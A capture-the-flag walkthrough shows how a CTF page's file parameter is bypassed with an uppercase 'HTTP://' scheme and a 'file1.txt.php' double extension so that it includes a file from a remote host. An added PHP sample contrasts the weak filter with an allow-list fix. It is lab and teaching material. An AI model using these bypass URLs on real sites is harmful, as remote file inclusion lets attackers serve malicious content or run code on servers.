CTF#2 Level 4

URL: http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php

Description: You are confronted with a website that loads some .txt files to display content for its pages. You are thinking that it may be vulnerable. You aim to load a nice file from a remote server and share the link with unsuspecting visitors.
Your task is to successfully load a PHP file located in the root of infosecinstitute.com. The file should not exist but you must load it without getting errors and it must have the PHP file extension.

Vulnerability: OWASP A4 Insecure Direct Object References

Solution:

Insecure Direct Object References exist because applications frequently use the actual name or key of an object when generating web pages, and applications don’t always verify that the user is authorized for the target object. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Based on the description, let’s hack the web :p

The site is simple: it only has a description and three links, for Bio, Client, and About. The three links are:

Bio Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file1.txt
Client Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file2.txt
About Link – http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file3.txt

That seems vulnerable at “ex4.php?file=”. On the main page you have been told to load a PHP web page that is located in the root of infosecinstitute.com, so I put

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=infosecinstitute.com/index.php

and the result is

invalid file selected

so I changed it to

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=infosecinstitute.com/file.txt

which came back with an error, but a different message:

There is something else that you must do.

It seems the file must be file1.txt, and I changed it to “ex4.php?file=infosecinstitute.com/file1.php”, and the error went back to the first error. Then I added “infosecinstitute.com/file1.txt.php” and the error went back to the second message. So I checked the hint, and I had forgotten to add http on infosecinstitute.com, so I added ex4.php?file=http://infosecinstitute.com/file1.txt.php. Still not working. Then I read and read the hint again; it said case sensitive, so I changed to

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=HTTP://infosecinstitute.com/file1.txt.php

And boom, pass :d

success
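
The case-sensitive filtering that the uppercase scheme got past, next to an allow-list lookup, as an added example that is not part of the original write-up or the CTF's code. `weak_is_allowed` is an assumed reconstruction of the check based on the responses above; the page keys, `resolve_page`, the scratch directory and the `example.test` host are hypothetical.

```php
<?php
// Added example. weak_is_allowed() is an ASSUMED reconstruction of the check,
// inferred from the responses in the write-up; it is not the CTF's source code.
function weak_is_allowed(string $file): bool
{
    // Case-sensitive blocklist: "http://" is caught, "HTTP://" is not.
    if (strpos($file, 'http://') !== false) {
        return false;
    }
    // Substring test instead of a real extension check: "file1.txt.php" passes.
    return strpos($file, '.txt') !== false;
}

// Hardened form: the request carries a page key (hypothetical names), and the
// server maps it to a fixed file. No path or URL from the client is ever used.
const PAGES = ['bio' => 'file1.txt', 'client' => 'file2.txt', 'about' => 'file3.txt'];

function resolve_page(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                       // unknown key: reject, do not guess
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    // Defence in depth: the resolved file must still sit inside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a scratch directory and made-up request values.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ex4_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
foreach (PAGES as $name) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $name, "demo\n");
}
$requests = ['file1.txt', 'http://example.test/file1.txt.php',
             'HTTP://example.test/file1.txt.php', 'bio'];
foreach ($requests as $value) {
    printf("%-36s weak=%-5s allowlist=%s\n", $value,
        var_export(weak_is_allowed($value), true),
        var_export(resolve_page($value, $dir) !== null, true));
}
```

With the allow-list, only a known key such as `bio` resolves to a file; every filename or URL supplied in the parameter is rejected regardless of letter case or appended extensions.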

Resources and Tools:
1. OWASP A4 Insecure Direct Object References – https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References
